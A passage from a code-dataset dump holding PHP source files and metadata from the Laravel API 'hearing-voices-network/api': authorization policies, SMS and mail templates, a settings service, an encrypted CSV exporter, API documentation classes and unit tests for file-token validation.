"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Schemas\\Audit;\n\nuse App\\Models\\Audit;\nuse App\\Support\\Enum;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass AuditSchema extends Schema\n{\n /**\n * @param string|null $objectId\n * @throws \\ReflectionException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->type(static::TYPE_OBJECT)\n ->properties(\n Schema::string('id')\n ->format(static::FORMAT_UUID),\n Schema::string('admin_id')\n ->format(static::FORMAT_UUID)\n ->nullable(),\n Schema::string('end_user_id')\n ->format(static::FORMAT_UUID)\n ->nullable(),\n Schema::string('client')\n ->nullable(),\n Schema::string('action')\n ->enum(...(new Enum(Audit::class))->getValues('ACTION')),\n Schema::string('description'),\n Schema::string('ip_address'),\n Schema::string('user_agent')\n ->nullable(),\n Schema::string('created_at')\n ->format(static::FORMAT_DATE_TIME)\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6176961660385132,
"alphanum_fraction": 0.6185308694839478,
"avg_line_length": 22.038461685180664,
"blob_id": "cf4a9f55da2ba46236526fcce47ba3bad979f68c",
"content_id": "92093ab1d5c5bcd1e280183d2c46658e0f9590b2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1198,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 52,
"path": "/app/Sms/TemplateSms.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Sms;\n\nuse App\\VariableSubstitution\\VariableSubstituter;\nuse Illuminate\\Support\\Facades\\Config;\n\nclass TemplateSms extends GenericSms\n{\n /**\n * @var \\App\\VariableSubstitution\\VariableSubstituter\n */\n protected $substituter;\n\n /**\n * Dispatcher constructor.\n *\n * @param string $to\n * @param string $body\n * @param \\App\\VariableSubstitution\\VariableSubstituter $substituter\n */\n public function __construct(string $to, string $body, VariableSubstituter $substituter)\n {\n parent::__construct($to, $body);\n\n $this->substituter = $substituter;\n }\n\n /**\n * Dispatch the email as a job to the queue.\n *\n * @param \\App\\Sms\\SmsSender $sender\n */\n public function handle(SmsSender $sender): void\n {\n $sender->send(\n Config::get('sms.from'),\n $this->substituter->substitute($this->to),\n $this->substituter->substitute($this->body)\n );\n }\n\n /**\n * @return \\App\\VariableSubstitution\\VariableSubstituter\n */\n public function getSubstituter(): VariableSubstituter\n {\n return $this->substituter;\n }\n}\n"
},
{
"alpha_fraction": 0.5537609457969666,
"alphanum_fraction": 0.5542224049568176,
"avg_line_length": 20.88888931274414,
"blob_id": "e587659b7ae57903271ea05876648c995d777111",
"content_id": "40a2e634016c492ec354a5e3ac16f4392d009886",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2167,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 99,
"path": "/app/Policies/EndUserPolicy.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Policies;\n\nuse App\\Models\\EndUser;\nuse App\\Models\\User;\nuse Illuminate\\Auth\\Access\\HandlesAuthorization;\n\nclass EndUserPolicy\n{\n use HandlesAuthorization;\n\n /**\n * Determine whether the user can list end users.\n *\n * @param \\App\\Models\\User $user\n * @return bool\n */\n public function list(User $user): bool\n {\n return $user->isAdmin();\n }\n\n /**\n * Determine whether the user can view the end user.\n *\n * @param \\App\\Models\\User $user\n * @param \\App\\Models\\EndUser $endUser\n * @return bool\n */\n public function view(User $user, EndUser $endUser): bool\n {\n if ($user->isAdmin()) {\n return true;\n }\n\n if ($user->isEndUser() && $user->endUser->is($endUser)) {\n return true;\n }\n\n return false;\n }\n\n /**\n * Determine whether the user can create end users.\n *\n * @param \\App\\Models\\User|null $user\n * @return bool\n */\n public function create(?User $user): bool\n {\n return optional($user)->isAdmin() || !optional($user)->isEndUser();\n }\n\n /**\n * Determine whether the user can update the end user.\n *\n * @param \\App\\Models\\User $user\n * @param \\App\\Models\\EndUser $endUser\n * @return bool\n */\n public function update(User $user, EndUser $endUser): bool\n {\n return $user->isEndUser() && $user->endUser->is($endUser);\n }\n\n /**\n * Determine whether the user can delete the end user.\n *\n * @param \\App\\Models\\User $user\n * @param \\App\\Models\\EndUser $endUser\n * @return bool\n */\n public function delete(User $user, EndUser $endUser): bool\n {\n if ($user->isAdmin()) {\n return true;\n }\n\n if ($user->isEndUser() && $user->endUser->is($endUser)) {\n return true;\n }\n\n return false;\n }\n\n /**\n * Determine whether the user can view the authenticated end user.\n *\n * @param \\App\\Models\\User $user\n * @return bool\n */\n public function me(User $user): bool\n {\n return $user->isEndUser();\n }\n}\n"
},
{
"alpha_fraction": 0.5454760193824768,
"alphanum_fraction": 0.5457122325897217,
"avg_line_length": 35.49137878417969,
"blob_id": "3de8dafefa505cfee4727098d1251ee13af48b5c",
"content_id": "6919e937a5e31f604e0cff8afcf963461963b402",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 4233,
"license_type": "permissive",
"max_line_length": 107,
"num_lines": 116,
"path": "/app/Services/SettingService.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Services;\n\nuse App\\Events\\Setting\\SettingsUpdated;\nuse App\\Models\\Setting;\nuse Illuminate\\Database\\Eloquent\\Collection;\nuse Illuminate\\Support\\Arr;\n\nclass SettingService\n{\n /**\n * @param array $data\n * @return \\Illuminate\\Database\\Eloquent\\Collection\n */\n public function update(array $data): Collection\n {\n /** @var \\App\\Models\\Setting $frontendContent */\n $frontendContent = Setting::findOrFail('frontend_content');\n\n /** @var \\App\\Models\\Setting $emailContent */\n $emailContent = Setting::findOrFail('email_content');\n\n // Update the frontend content settings.\n $frontendContent->value = [\n 'home_page' => [\n 'title' => $this->frontendContentValue($data, 'home_page.title'),\n ],\n ];\n $frontendContent->save();\n\n // Update the email content settings.\n $emailContent->value = [\n 'admin' => [\n 'new_contribution' => [\n 'subject' => $this->emailContentValue($data, 'admin.new_contribution.subject'),\n 'body' => $this->emailContentValue($data, 'admin.new_contribution.body'),\n ],\n 'updated_contribution' => [\n 'subject' => $this->emailContentValue($data, 'admin.updated_contribution.subject'),\n 'body' => $this->emailContentValue($data, 'admin.updated_contribution.body'),\n ],\n 'new_end_user' => [\n 'subject' => $this->emailContentValue($data, 'admin.new_end_user.subject'),\n 'body' => $this->emailContentValue($data, 'admin.new_end_user.body'),\n ],\n 'password_reset' => [\n 'subject' => $this->emailContentValue($data, 'admin.password_reset.subject'),\n 'body' => $this->emailContentValue($data, 'admin.password_reset.body'),\n ],\n ],\n 'end_user' => [\n 'email_confirmation' => [\n 'subject' => $this->emailContentValue($data, 'end_user.email_confirmation.subject'),\n 'body' => $this->emailContentValue($data, 'end_user.email_confirmation.body'),\n ],\n 'password_reset' => [\n 'subject' => $this->emailContentValue($data, 'end_user.password_reset.subject'),\n 'body' => $this->emailContentValue($data, 'end_user.password_reset.body'),\n ],\n 'contribution_approved' => [\n 'subject' => $this->emailContentValue($data, 'end_user.contribution_approved.subject'),\n 'body' => $this->emailContentValue($data, 'end_user.contribution_approved.body'),\n ],\n 'contribution_rejected' => [\n 'subject' => $this->emailContentValue($data, 'end_user.contribution_rejected.subject'),\n 'body' => $this->emailContentValue($data, 'end_user.contribution_rejected.body'),\n ],\n ],\n ];\n $emailContent->save();\n\n $settings = Setting::all();\n\n event(new SettingsUpdated($settings));\n\n return $settings;\n }\n\n /**\n * Helper function for getting the value of content settings.\n *\n * @param array $data\n * @param string $settingKey\n * @param string $nestedKey\n * @return string\n */\n protected function contentValue(array $data, string $settingKey, string $nestedKey): string\n {\n $setting = Setting::findOrFail($settingKey);\n\n return Arr::get($data, \"{$settingKey}.{$nestedKey}\") ?? Arr::get($setting->value, $nestedKey);\n }\n\n /**\n * @param array $data\n * @param string $key\n * @return string\n */\n protected function frontendContentValue(array $data, string $key): string\n {\n return $this->contentValue($data, 'frontend_content', $key);\n }\n\n /**\n * @param array $data\n * @param string $key\n * @return string\n */\n protected function emailContentValue(array $data, string $key): string\n {\n return $this->contentValue($data, 'email_content', $key);\n }\n}\n"
},
{
"alpha_fraction": 0.5306748747825623,
"alphanum_fraction": 0.5314416885375977,
"avg_line_length": 30.80487823486328,
"blob_id": "3daf2f6d5f4df13c4fed15cee40eb6e05c61c5f7",
"content_id": "eeb5c7590411567cd84c21773062b718f9901915",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1304,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 41,
"path": "/app/Http/Filters/EndUser/EmailVerifiedFilter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Filters\\EndUser;\n\nuse Illuminate\\Database\\Eloquent\\Builder;\nuse Spatie\\QueryBuilder\\Filters\\Filter;\n\nclass EmailVerifiedFilter implements Filter\n{\n /**\n * @param \\Illuminate\\Database\\Eloquent\\Builder $query\n * @param bool|string $emailVerified\n * @param string $property\n * @return \\Illuminate\\Database\\Eloquent\\Builder\n */\n public function __invoke(Builder $query, $emailVerified, string $property): Builder\n {\n $emailVerified = $emailVerified === true ? 'true' : $emailVerified;\n $emailVerified = $emailVerified === false ? 'false' : $emailVerified;\n\n return $query->whereHas(\n 'user',\n function (Builder $query) use ($emailVerified): void {\n switch ($emailVerified) {\n case 'true':\n $query->whereNotNull('users.email_verified_at');\n break;\n case 'false':\n $query->whereNull('users.email_verified_at');\n break;\n case 'all':\n default:\n // Don't apply and extra conditions, instead load all.\n break;\n }\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5646490454673767,
"alphanum_fraction": 0.5657857060432434,
"avg_line_length": 26.069231033325195,
"blob_id": "4668af13952c60c0b38ee66261e4bd5d2c1a6a33",
"content_id": "7c4a706ff5c85c279ad72ecc952483093b2f91c1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3519,
"license_type": "permissive",
"max_line_length": 94,
"num_lines": 130,
"path": "/app/Exporters/BaseExporter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Exporters;\n\nuse App\\Models\\Admin;\nuse App\\Models\\Export;\nuse App\\Models\\File;\nuse Illuminate\\Support\\Facades\\Config;\nuse Illuminate\\Support\\Facades\\Date;\nuse Illuminate\\Support\\Facades\\Storage;\nuse Illuminate\\Support\\Str;\nuse ZipArchive;\n\nabstract class BaseExporter\n{\n /**\n * @return string\n */\n abstract protected function filename(): string;\n\n /**\n * @return array\n */\n abstract protected function data(): array;\n\n /**\n * @return string\n */\n public static function type(): string\n {\n $type = class_basename(static::class);\n $type = str_replace('Exporter', '', $type);\n $type = Str::snake($type);\n\n return $type;\n }\n\n /**\n * Run the export and return the generated export.\n *\n * @param \\App\\Models\\Admin $admin\n * @throws \\Illuminate\\Contracts\\Filesystem\\FileNotFoundException\n * @return \\App\\Models\\Export\n */\n public function exportFor(Admin $admin): Export\n {\n /** @var \\App\\Models\\File $file */\n $file = File::create([\n 'filename' => $this->filename(),\n 'mime_type' => 'application/zip',\n 'is_private' => true,\n ]);\n\n /** @var \\App\\Models\\FileToken $fileToken */\n $fileToken = $file->fileTokens()->create([\n 'user_id' => $admin->user_id,\n 'created_at' => Date::now(),\n ]);\n\n $contents = $this->createCsv();\n $decryptionKey = Str::random();\n\n $file->upload(\n $this->createZip($contents, $decryptionKey)\n );\n\n return new Export($fileToken, $decryptionKey);\n }\n\n /**\n * @throws \\Illuminate\\Contracts\\Filesystem\\FileNotFoundException\n * @return string\n */\n protected function createCsv(): string\n {\n return $this->tempFileContents(\n function (string $filepath): void {\n $csv = fopen($filepath, 'w');\n\n foreach ($this->data() as $row) {\n fputcsv($csv, $row);\n }\n\n fclose($csv);\n }\n );\n }\n\n /**\n * @param string $contents\n * @param string $decryptionKey\n * @throws \\Illuminate\\Contracts\\Filesystem\\FileNotFoundException\n * @return string The zip contents\n */\n protected function createZip(string $contents, string $decryptionKey): string\n {\n return $this->tempFileContents(\n function (string $filepath) use ($contents, $decryptionKey): void {\n $zip = new ZipArchive();\n $zip->open($filepath, ZipArchive::CREATE);\n $zip->addFromString('export.csv', $contents);\n $zip->setEncryptionName('export.csv', ZipArchive::EM_AES_256, $decryptionKey);\n $zip->close();\n }\n );\n }\n\n /**\n * Allows the callback to create a temporary file and extract its content.\n * The temporary file is then immediately deleted.\n *\n * @param callable $callback\n * @throws \\Illuminate\\Contracts\\Filesystem\\FileNotFoundException\n * @return string\n */\n protected function tempFileContents(callable $callback): string\n {\n $filename = Str::uuid()->toString() . '.tmp';\n $filepath = Config::get('filesystems.disks.temp.root') . '/' . $filename;\n\n $callback($filepath);\n\n $contents = Storage::disk('temp')->get($filename);\n Storage::disk('temp')->delete($filename);\n\n return $contents;\n }\n}\n"
},
{
"alpha_fraction": 0.6683587431907654,
"alphanum_fraction": 0.6700507402420044,
"avg_line_length": 20.10714340209961,
"blob_id": "01aa972aff272833b38d4754922ad2da8f86b831",
"content_id": "563bd62e60fa5bd895eca3995cc787f8115356e0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 591,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 28,
"path": "/app/Models/Audit.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models;\n\nuse GoldSpecDigital\\LaravelEloquentUUID\\Database\\Eloquent\\Model;\n\nclass Audit extends Model\n{\n use Mutators\\AuditMutators;\n use Relationships\\AuditRelationships;\n use Scopes\\AuditScopes;\n\n const ACTION_LOGIN = 'login';\n const ACTION_LOGOUT = 'logout';\n const ACTION_CREATE = 'create';\n const ACTION_READ = 'read';\n const ACTION_UPDATE = 'update';\n const ACTION_DELETE = 'delete';\n\n /**\n * Indicates if the model should be timestamped.\n *\n * @var bool\n */\n public $timestamps = false;\n}\n"
},
{
"alpha_fraction": 0.7020262479782104,
"alphanum_fraction": 0.7032181024551392,
"avg_line_length": 28.964284896850586,
"blob_id": "df56be65a853f2cc8ff4f600937e54d4ddafcc5c",
"content_id": "1a581f20dfe9c5d49955ed51c053f142b584fc0b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 839,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 28,
"path": "/app/Docs/Paths/EndUsers/EndUsersRootPath.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Paths\\EndUsers;\n\nuse App\\Docs\\Operations\\EndUser\\IndexEndUserOperation;\nuse App\\Docs\\Operations\\EndUser\\StoreEndUserOperation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem;\n\nclass EndUsersRootPath extends PathItem\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->route('/end-users')\n ->operations(\n IndexEndUserOperation::create(),\n StoreEndUserOperation::create()\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5715871453285217,
"alphanum_fraction": 0.5726969838142395,
"avg_line_length": 18.586956024169922,
"blob_id": "71d8f67fbbd44f21997a05acec9eb7ae618e9ade",
"content_id": "799086e019999fec6c35a604f679715d048ad36a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 901,
"license_type": "permissive",
"max_line_length": 59,
"num_lines": 46,
"path": "/app/Policies/FilePolicy.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Policies;\n\nuse App\\Models\\File;\nuse App\\Models\\User;\nuse Illuminate\\Auth\\Access\\HandlesAuthorization;\n\nclass FilePolicy\n{\n use HandlesAuthorization;\n\n /**\n * Determine whether the user can request the export.\n *\n * @param \\App\\Models\\User $user\n * @param \\App\\Models\\File $file\n * @return bool\n */\n public function request(User $user, File $file): bool\n {\n return $user->isAdmin();\n }\n\n /**\n * Determine whether the user can download the file.\n *\n * @param \\App\\Models\\User|null $user\n * @param \\App\\Models\\File $file\n * @return bool\n */\n public function download(?User $user, File $file): bool\n {\n if ($file->isPublic()) {\n return true;\n }\n\n if (optional($user)->isAdmin()) {\n return true;\n }\n\n return false;\n }\n}\n"
},
{
"alpha_fraction": 0.5910845994949341,
"alphanum_fraction": 0.5914356112480164,
"avg_line_length": 23.560344696044922,
"blob_id": "a74695691741d47138a47459fec99765adc28c8e",
"content_id": "9a137dc882a55313db5094fb82b2c54f8ec58dca",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2849,
"license_type": "permissive",
"max_line_length": 94,
"num_lines": 116,
"path": "/app/Policies/ContributionPolicy.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Policies;\n\nuse App\\Models\\Contribution;\nuse App\\Models\\User;\nuse Illuminate\\Auth\\Access\\HandlesAuthorization;\n\nclass ContributionPolicy\n{\n use HandlesAuthorization;\n\n /**\n * Determine whether the user can list contributions.\n *\n * @param \\App\\Models\\User|null $user\n * @return bool\n */\n public function list(?User $user): bool\n {\n return true;\n }\n\n /**\n * Determine whether the user can view the contribution.\n *\n * @param \\App\\Models\\User|null $user\n * @param \\App\\Models\\Contribution $contribution\n * @return bool\n */\n public function view(?User $user, Contribution $contribution): bool\n {\n if (optional($user)->isAdmin()) {\n return true;\n }\n\n if ($contribution->isPublic()) {\n return true;\n }\n\n if (optional($user)->isEndUser() && $contribution->belongsToEndUser($user->endUser)) {\n return true;\n }\n\n return false;\n }\n\n /**\n * Determine whether the user can create contributions.\n *\n * @param \\App\\Models\\User $user\n * @return bool\n */\n public function create(User $user): bool\n {\n return $user->isEndUser();\n }\n\n /**\n * Determine whether the user can update the contribution.\n *\n * @param \\App\\Models\\User $user\n * @param \\App\\Models\\Contribution $contribution\n * @return bool\n */\n public function update(User $user, Contribution $contribution): bool\n {\n return $user->isEndUser() && $contribution->belongsToEndUser($user->endUser);\n }\n\n /**\n * Determine whether the user can delete the contribution.\n *\n * @param \\App\\Models\\User $user\n * @param \\App\\Models\\Contribution $contribution\n * @return bool\n */\n public function delete(User $user, Contribution $contribution): bool\n {\n if ($user->isAdmin()) {\n return true;\n }\n\n if ($user->isEndUser() && $contribution->belongsToEndUser($user->endUser)) {\n return true;\n }\n\n return false;\n }\n\n /**\n * Determine whether the user can approve the contribution.\n *\n * @param \\App\\Models\\User $user\n * @param \\App\\Models\\Contribution $contribution\n * @return bool\n */\n public function approve(User $user, Contribution $contribution): bool\n {\n return $user->isAdmin() && $contribution->isInReview();\n }\n\n /**\n * Determine whether the user can reject the contribution.\n *\n * @param \\App\\Models\\User $user\n * @param \\App\\Models\\Contribution $contribution\n * @return bool\n */\n public function reject(User $user, Contribution $contribution): bool\n {\n return $user->isAdmin() && ($contribution->isPublic() || $contribution->isInReview());\n }\n}\n"
},
{
"alpha_fraction": 0.541412889957428,
"alphanum_fraction": 0.5417174100875854,
"avg_line_length": 26.14049530029297,
"blob_id": "463fd06bd70cea760819cda3d2aba3dfdb9d371c",
"content_id": "3c0e2e87def78053b0a4a197e49a4bf19e04b04f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3284,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 121,
"path": "/tests/Unit/Rules/ValidFileTokenTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Unit\\Rules;\n\nuse App\\Models\\Admin;\nuse App\\Models\\File;\nuse App\\Rules\\ValidFileToken;\nuse Illuminate\\Support\\Facades\\Date;\nuse Illuminate\\Support\\Str;\nuse Tests\\TestCase;\n\nclass ValidFileTokenTest extends TestCase\n{\n /** @test */\n public function it_passes_a_public_file(): void\n {\n /** @var \\App\\Models\\File $file */\n $file = factory(File::class)->state('public')->create();\n\n $rule = new ValidFileToken($file, null);\n\n $result = $rule->passes('test', 'random_token');\n\n $this->assertTrue($result);\n }\n\n /** @test */\n public function it_passes_a_valid_file_token(): void\n {\n /** @var \\App\\Models\\File $file */\n $file = factory(File::class)->state('private')->create();\n\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n /** @var \\App\\Models\\FileToken $fileToken */\n $fileToken = $file->fileTokens()->create([\n 'user_id' => $admin->user->id,\n 'created_at' => Date::now(),\n ]);\n\n $rule = new ValidFileToken($file, $admin);\n\n $result = $rule->passes('test', $fileToken->id);\n\n $this->assertTrue($result);\n }\n\n /** @test */\n public function it_fails_an_invalid_file_token(): void\n {\n /** @var \\App\\Models\\File $file */\n $file = factory(File::class)->state('private')->create();\n\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n $rule = new ValidFileToken($file, $admin);\n\n $result = $rule->passes('test', Str::uuid()->toString());\n\n $this->assertFalse($result);\n }\n\n /** @test */\n public function it_fails_a_valid_token_but_no_admin(): void\n {\n /** @var \\App\\Models\\File $file */\n $file = factory(File::class)->state('private')->create();\n\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n /** @var \\App\\Models\\FileToken $fileToken */\n $fileToken = $file->fileTokens()->create([\n 'user_id' => $admin->user->id,\n 'created_at' => Date::now(),\n ]);\n\n $rule = new ValidFileToken($file, null);\n\n $result = $rule->passes('test', $fileToken->id);\n\n $this->assertFalse($result);\n }\n\n /** @test */\n public function it_fails_a_valid_token_but_different_admin(): void\n {\n /** @var \\App\\Models\\File $file */\n $file = factory(File::class)->state('private')->create();\n\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n /** @var \\App\\Models\\FileToken $fileToken */\n $fileToken = $file->fileTokens()->create([\n 'user_id' => factory(Admin::class)->create()->user->id,\n 'created_at' => Date::now(),\n ]);\n\n $rule = new ValidFileToken($file, $admin);\n\n $result = $rule->passes('test', $fileToken->id);\n\n $this->assertFalse($result);\n }\n\n /** @test */\n public function message_is_correct(): void\n {\n $rule = new ValidFileToken(\n factory(File::class)->create(),\n null\n );\n\n $this->assertEquals('The :attribute must be valid.', $rule->message());\n }\n}\n"
},
{
"alpha_fraction": 0.5901525616645813,
"alphanum_fraction": 0.590846061706543,
"avg_line_length": 22.639345169067383,
"blob_id": "3690ba35c1ccef184ef1443c6359ecba02d3d27a",
"content_id": "061a23ed016801678bac28c4e25502c8321066d1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1442,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 61,
"path": "/app/Mail/TemplateMail.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Mail;\n\nuse App\\VariableSubstitution\\VariableSubstituter;\nuse Illuminate\\Contracts\\Mail\\Mailer;\nuse Illuminate\\Mail\\Message;\n\nclass TemplateMail extends GenericMail\n{\n /**\n * @var \\App\\VariableSubstitution\\VariableSubstituter\n */\n protected $substituter;\n\n /**\n * Dispatcher constructor.\n *\n * @param string $to\n * @param string $subject\n * @param string $body\n * @param \\App\\VariableSubstitution\\VariableSubstituter $substituter\n */\n public function __construct(\n string $to,\n string $subject,\n string $body,\n VariableSubstituter $substituter\n ) {\n parent::__construct($to, $subject, $body);\n\n $this->substituter = $substituter;\n }\n\n /**\n * Dispatch the email as a job to the queue.\n *\n * @param \\Illuminate\\Contracts\\Mail\\Mailer $mailer\n */\n public function handle(Mailer $mailer): void\n {\n $mailer->raw(\n $this->substituter->substitute($this->body),\n function (Message $message): void {\n $message\n ->to($this->to)\n ->subject($this->substituter->substitute($this->subject));\n }\n );\n }\n\n /**\n * @return \\App\\VariableSubstitution\\VariableSubstituter\n */\n public function getSubstituter(): VariableSubstituter\n {\n return $this->substituter;\n }\n}\n"
},
{
"alpha_fraction": 0.6180297136306763,
"alphanum_fraction": 0.6189591288566589,
"avg_line_length": 23.454545974731445,
"blob_id": "b2ac32f8ffe6c91b2c21a206bf8852b879833259",
"content_id": "b6bd76dfe9e294575ede6dd7a75a7c9f3d9dff20",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1076,
"license_type": "permissive",
"max_line_length": 94,
"num_lines": 44,
"path": "/app/Providers/AppServiceProvider.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Providers;\n\nuse App\\Sms\\LogSmsSender;\nuse App\\Sms\\NullSmsSender;\nuse App\\Sms\\SmsSender;\nuse Carbon\\CarbonImmutable;\nuse Illuminate\\Support\\Facades\\Config;\nuse Illuminate\\Support\\Facades\\Date;\nuse Illuminate\\Support\\ServiceProvider;\n\nclass AppServiceProvider extends ServiceProvider\n{\n /**\n * Register any application services.\n */\n public function register(): void\n {\n // Use CarbonImmutable as the date instance.\n Date::use(CarbonImmutable::class);\n\n // Bind the SMS sender concrete implementation to the interface through configuration.\n switch (Config::get('sms.driver')) {\n case 'log':\n $this->app->singleton(SmsSender::class, LogSmsSender::class);\n break;\n case 'null':\n default:\n $this->app->singleton(SmsSender::class, NullSmsSender::class);\n break;\n }\n }\n\n /**\n * Bootstrap any application services.\n */\n public function boot(): void\n {\n //\n }\n}\n"
},
{
"alpha_fraction": 0.5679486989974976,
"alphanum_fraction": 0.5794872045516968,
"avg_line_length": 24.161291122436523,
"blob_id": "5fe532561f48c6ca111bd5d770bc6864345d3891",
"content_id": "1754744acef174292647321cdd976f1c64e2d1fc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 780,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 31,
"path": "/app/Http/Resources/AdminResource.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Resources;\n\nuse Illuminate\\Http\\Resources\\Json\\JsonResource;\n\n/**\n * @property \\App\\Models\\Admin $resource\n */\nclass AdminResource extends JsonResource\n{\n /**\n * Transform the resource into an array.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @return array\n */\n public function toArray($request): array\n {\n return [\n 'id' => $this->resource->id,\n 'name' => $this->resource->name,\n 'phone' => $this->resource->phone,\n 'email' => $this->resource->user->email,\n 'created_at' => $this->resource->user->created_at->toIso8601String(),\n 'updated_at' => $this->resource->user->updated_at->toIso8601String(),\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.6368613243103027,
"alphanum_fraction": 0.6374695897102356,
"avg_line_length": 32.551021575927734,
"blob_id": "e7e241cab3a762b887b880a8d89ab086756a6570",
"content_id": "49a2e10620f5e70edecb7470e2012a86efb30a9a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1644,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 49,
"path": "/app/Docs/Operations/EndUser/StoreEndUserOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\EndUser;\n\nuse App\\Docs\\Schemas\\EndUser\\EndUserSchema;\nuse App\\Docs\\Schemas\\EndUser\\StoreEndUserSchema;\nuse App\\Docs\\Schemas\\ResourceSchema;\nuse App\\Docs\\Tags\\EndUsersTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\MediaType;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\RequestBody;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response;\n\nclass StoreEndUserOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_POST)\n ->summary('Create an end user')\n ->description(\n Utils::operationDescription(['Public', Admin::class])\n )\n ->tags(EndUsersTag::create())\n ->noSecurity()\n ->requestBody(\n RequestBody::create()->content(\n MediaType::json()->schema(StoreEndUserSchema::create())\n )\n )\n ->responses(\n Response::created()->content(\n MediaType::json()->schema(\n ResourceSchema::create(null, EndUserSchema::create())\n )\n )\n );\n }\n}\n"
},
{
